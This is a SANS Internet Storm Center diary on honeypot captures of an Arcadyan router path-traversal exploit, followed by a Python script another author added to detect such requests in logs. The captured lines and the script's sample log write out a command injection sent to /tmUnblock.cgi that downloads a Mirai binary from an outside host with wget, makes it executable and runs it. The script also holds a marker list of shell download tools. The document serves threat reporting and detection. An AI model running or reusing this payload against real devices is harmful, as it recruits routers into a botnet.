Over the past 7 days, my honeypot captured a few hundred POST requests for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware. If successfully exploited, it could allow unauthenticated remote actors to bypass authentication and add the router to the Mirai botnet.
20211125-135312: 192.168.25.9:80-188.8.131.52:44670 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//184.108.40.206/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
20211126-090429: 192.168.25.9:80-220.127.116.11:39036 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//18.104.22.168/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
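An added detection example (my own code, not part of the diary): it parses honeypot lines in the format shown above, flags POSTs to /tmUnblock.cgi whose body carries shell download-and-execute markers, extracts the defanged payload host as an indicator, and counts hits per source address. The sample lines are constructed in the same format, using TEST-NET addresses rather than the captured ones.

```python
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample in the honeypot's two-line format:
#   <yyyymmdd-hhmmss>: <dst>:<dport>-<src>:<sport> data
#   <METHOD> <path> [<body>]
SAMPLE_LOG = """\
20211125-135312: 192.168.25.9:80-203.0.113.52:44670 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//203.0.113.206/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
20211126-090429: 192.168.25.9:80-198.51.100.11:39036 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//198.51.100.168/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
20211126-091000: 192.168.25.9:80-198.51.100.12:40000 data
GET /index.html
"""

HEADER_RE = re.compile(r"^(\d{8}-\d{6}): (?P<dst>[\d.]+):\d+-(?P<src>[\d.]+):\d+ data$")
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<body>.*))?$")
# Accepts both live (http://) and defanged (http[:]//) URLs; group 1 is the host.
URL_RE = re.compile(r"(?:https?|ftp)\[?:\]?//([\w.\-]+)(/\S*)?")
SHELL_MARKERS = ("wget ", "curl ", "tftp ", "chmod ", "/tmp")

@dataclass
class Hit:
    timestamp: str
    src: str
    path: str
    payload_hosts: list = field(default_factory=list)
    markers: list = field(default_factory=list)

def parse_honeypot_log(text):
    """Return one Hit per POST to /tmUnblock.cgi that carries shell download/exec markers."""
    hits, header = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            header = m            # remember the connection line, request follows
            continue
        r = REQUEST_RE.match(line)
        if header and r:
            body = r.group("body") or ""
            markers = [k for k in SHELL_MARKERS if k in body]
            if r.group("method") == "POST" and r.group("path") == "/tmUnblock.cgi" and markers:
                hosts = [h for h, _ in URL_RE.findall(body)]
                hits.append(Hit(header.group(1), header.group("src"), r.group("path"), hosts, markers))
        header = None

    return hits

def top_sources(hits, n=10):
    """Count hits per source address, most active first (the diary's 'Top 10 IPs')."""
    return Counter(h.src for h in hits).most_common(n)

if __name__ == "__main__":
    for h in parse_honeypot_log(SAMPLE_LOG):
        print(h.timestamp, h.src, h.payload_hosts, h.markers)
```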
Indicators: Top 10 IPs
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: SANS storm